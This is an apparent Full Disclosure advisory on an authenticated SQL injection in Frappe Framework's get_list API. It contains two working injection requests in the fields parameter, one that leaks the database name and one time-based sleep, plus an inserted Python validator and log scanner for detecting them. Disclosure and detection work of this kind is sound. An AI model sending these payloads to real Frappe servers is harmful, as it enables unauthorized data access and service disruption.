Message-Id: <2D44FEA4-617A-4CDB-AFA0-E65D8B9746C8@gmail.com>
Date: Tue, 27 May 2025 17:04:14 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Structured Query Language Injection in
	frappe.desk.reportview.get_list Endpoint in Frappe Framework


An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting version v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK

{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time-based attack:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--
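As an added, defensive example (not part of this advisory and not Frappe's own code): a Python allow-list check for entries of the `fields` parameter, applied to a request URL and to constructed access-log lines in a common-log-style format. The two flagged requests reuse the request paths quoted above; the client, user and host values are placeholders, and the regular expressions are this example's own assumptions about what a legitimate column reference looks like.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit
# Allow-list for one entry of the reportview.get_list `fields` parameter:
# optional `tabDocType`. qualifier, a column name (optionally backtick-quoted),
# optional "as alias". Commas, parentheses and subqueries never match.
_SAFE_FIELD = re.compile(
    r"^\s*(?:`tab[A-Za-z0-9 _-]+`\.)?`?[A-Za-z_]\w*`?(?:\s+as\s+`?[A-Za-z_]\w*`?)?\s*$",
    re.IGNORECASE,
)
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in an access-log line

def is_safe_field(expr: str) -> bool:
    """True only if `expr` is a plain column reference."""
    return _SAFE_FIELD.match(expr) is not None

def extract_fields(url: str) -> list[str]:
    """Entries of the JSON list in the `fields` query parameter (parse_qs already
    URL-decodes it); a value that is not a JSON list is returned as one entry."""
    raw = parse_qs(urlsplit(url).query).get("fields", [None])[0]
    if raw is None:
        return []
    try:
        fields = json.loads(raw)
    except json.JSONDecodeError:
        return [raw]
    return [str(f) for f in fields] if isinstance(fields, list) else [str(fields)]

def unsafe_fields(url: str) -> list[str]:
    """Entries of `fields` that are not plain column references."""
    return [f for f in extract_fields(url) if not is_safe_field(f)]

def flag_log_lines(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(line index, offending entries) for each get_list request in `lines`."""
    hits = []
    for i, line in enumerate(lines):
        m = _REQ.search(line)
        if m and "frappe.desk.reportview.get_list" in m.group(1):
            bad = unsafe_fields(m.group(1))
            if bad:
                hits.append((i, bad))
    return hits

# Constructed access-log lines (placeholder client/user/host); the first two carry
# the request paths quoted in the advisory, the third is a benign listing.
SAMPLE_LOG = [
    '10.0.0.5 - user1 [27/May/2025:17:04:14 -0400] "GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20 HTTP/2" 200 512',
    '10.0.0.5 - user1 [27/May/2025:17:05:02 -0400] "GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20 HTTP/2" 200 512',
    '10.0.0.9 - user2 [27/May/2025:17:06:30 -0400] "GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22name%22%2C%22salary_component_abbr%20as%20abbr%22%5D&doctype=Salary%20Component&limit=20 HTTP/2" 200 2048',
]
```

Running `flag_log_lines(SAMPLE_LOG)` reports the first two lines with the offending `fields` entries and leaves the plain column listing alone; the same `unsafe_fields` check can sit in front of the endpoint as a request-time validator.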


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/